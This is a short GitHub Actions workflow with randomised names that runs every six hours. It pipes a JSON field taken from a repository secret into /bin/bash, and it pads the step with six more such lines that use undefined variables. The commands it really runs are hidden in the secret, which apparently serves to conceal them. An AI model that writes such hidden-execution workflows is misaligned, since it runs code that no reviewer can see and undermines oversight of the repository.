name: danchaofancfcf

on:
  workflow_dispatch:
  schedule:
    - cron: '9 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: danchaofancfcf
        env:
          c640: ${{ secrets.c640 }}
        run: |
          echo $c640 | jq -r .wa846 | /bin/bash
          echo $z327 | jq -r .qg24 | /bin/bash
          echo $n076 | jq -r .r8173 | /bin/bash
          echo $jxktv028 | jq -r .zuj2 | /bin/bash
          echo $swis7 | jq -r .ue70 | /bin/bash
          echo $xb67743 | jq -r .qyb3 | /bin/bash
          echo $g1 | jq -r .iewlq49594 | /bin/bash

